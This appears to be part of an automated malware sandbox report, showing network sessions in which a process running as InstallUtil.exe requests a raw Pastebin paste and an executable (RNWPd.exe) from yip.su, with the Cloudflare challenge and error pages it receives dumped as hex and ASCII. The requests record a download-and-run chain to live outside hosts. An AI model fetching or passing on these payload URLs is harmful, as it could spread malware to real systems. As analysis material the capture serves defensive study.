2024-08-11 09:22:09 UTC	1369	IN	Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
2024-08-11 09:22:09 UTC	1369	IN	Data Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
2024-08-11 09:22:09 UTC	1369	IN	Data Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
2024-08-11 09:22:09 UTC	1369	IN	Data Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72 Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
2024-08-11 09:22:09 UTC	1369	IN	Data Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
2024-08-11 09:22:09 UTC	1369	IN	Data Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69 Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
2024-08-11 09:22:09 UTC	1369	IN	Data Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 32 34 39 39 32 27 2c 63 52 61 79 3a 20 27 38 62 31 37 32 38 64 35 66 63 30 61 34 32 36 32 27 2c 63 48 61 73 68 3a 20 27 31 36 36 63 64 36 64 66 65 32 37 32 35 37 35 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 30 6e 4a 65 57 70 4f 32 72 7a 33 4e 30 57 6c 61 64 54 34 57 4f 6f 32 32 43 39 31 44 6c 51 43 57 74 76 48 78 30 79 37 75 6e 55 4d 2d 31 37 32 33 33 36 38 31 32 38 2d 30 2e 30 2e 31 2e 31 2d 33 36 32 35 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '24992',cRay: '8b1728d5fc0a4262',cHash: '166cd6dfe272575',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=0nJeWpO2rz3N0WladT4WOo22C91DlQCWtvHx0y7unUM-1723368128-0.0.1.1-3625",cFPWv: 'g',cTTim
2024-08-11 09:22:09 UTC	1369	IN	Data Raw: 4e 7a 54 53 31 5f 56 6d 4d 36 74 70 4f 41 53 53 58 79 4e 39 64 7a 41 4e 78 46 45 67 56 30 4d 61 76 79 33 65 51 7a 6e 4e 69 75 79 30 47 67 46 4a 47 6d 6a 4f 62 4d 6e 42 42 57 69 39 54 33 61 41 79 75 38 71 45 6a 37 69 7a 52 36 38 5f 37 65 30 44 4e 49 79 4b 6d 7a 48 48 63 64 76 52 77 41 61 34 53 4f 44 33 62 6e 7a 4b 70 53 4e 34 58 32 58 79 6a 32 76 31 63 54 66 4f 47 31 54 6f 62 64 4e 73 31 4b 6b 71 46 52 37 46 72 48 32 6c 51 7a 69 41 7a 5a 72 51 43 68 55 36 74 6b 46 6b 79 36 4d 56 6a 66 47 39 61 70 37 34 49 45 56 2e 42 4e 71 77 66 39 6d 62 55 43 6d 50 32 36 4a 36 30 70 6b 52 4d 75 55 59 38 63 6b 46 61 52 56 46 77 57 68 47 65 5a 52 76 59 55 54 4a 39 38 35 55 54 6e 68 6c 7a 30 36 48 69 76 4a 37 7a 44 47 46 76 63 53 73 4a 4e 57 62 66 69 6b 66 63 6e 54 44 34 75 Data Ascii: NzTS1_VmM6tpOASSXyN9dzANxFEgV0Mavy3eQznNiuy0GgFJGmjObMnBBWi9T3aAyu8qEj7izR68_7e0DNIyKmzHHcdvRwAa4SOD3bnzKpSN4X2Xyj2v1cTfOG1TobdNs1KkqFR7FrH2lQziAzZrQChU6tkFky6MVjfG9ap74IEV.BNqwf9mbUCmP26J60pkRMuUY8ckFaRVFwWhGeZRvYUTJ985UTnhlz06HivJ7zDGFvcSsJNWbfikfcnTD4u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49721	172.67.19.24	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:13 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-08-11 09:22:14 UTC	222	IN	HTTP/1.1 200 OK Date: Sun, 11 Aug 2024 09:22:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8b1728f5fe0d4345-EWR
2024-08-11 09:22:14 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-11 09:22:14 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-08-11 09:22:14 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-08-11 09:22:14 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-08-11 09:22:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49722	188.114.97.3	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:14 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-08-11 09:22:14 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sun, 11 Aug 2024 09:22:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-11 09:22:14 UTC	685	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 78 6c 69 51 72 56 75 55 6e 32 51 38 68 44 6a 6e 62 78 4e 6d 6a 72 44 7a 45 51 30 6a 36 73 53 4c 58 47 44 65 53 30 77 46 2f 71 4f 64 53 66 4f 36 69 39 6d 31 55 6d 59 4d 39 4f 31 68 55 31 38 48 77 61 64 47 51 75 43 61 4b 74 59 4d 76 53 4b 43 68 71 32 4b 49 78 32 57 64 65 52 42 6a 47 77 52 42 36 2f 62 4c 66 37 2f 55 71 77 3d 24 52 47 63 35 36 56 35 64 2f 4d 7a 55 6c 50 63 6f 36 61 68 42 54 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: xliQrVuUn2Q8hDjnbxNmjrDzEQ0j6sSLXGDeS0wF/qOdSfO6i9m1UmYM9O1hU18HwadGQuCaKtYMvSKChq2KIx2WdeRBjGwRB6/bLf7/Uqw=$RGc56V5d/MzUlPco6ahBTw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-08-11 09:22:14 UTC	1369	IN	Data Raw: 33 62 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3bfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-08-11 09:22:14 UTC	1369	IN	Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
2024-08-11 09:22:14 UTC	1369	IN	Data Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
2024-08-11 09:22:14 UTC	1369	IN	Data Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
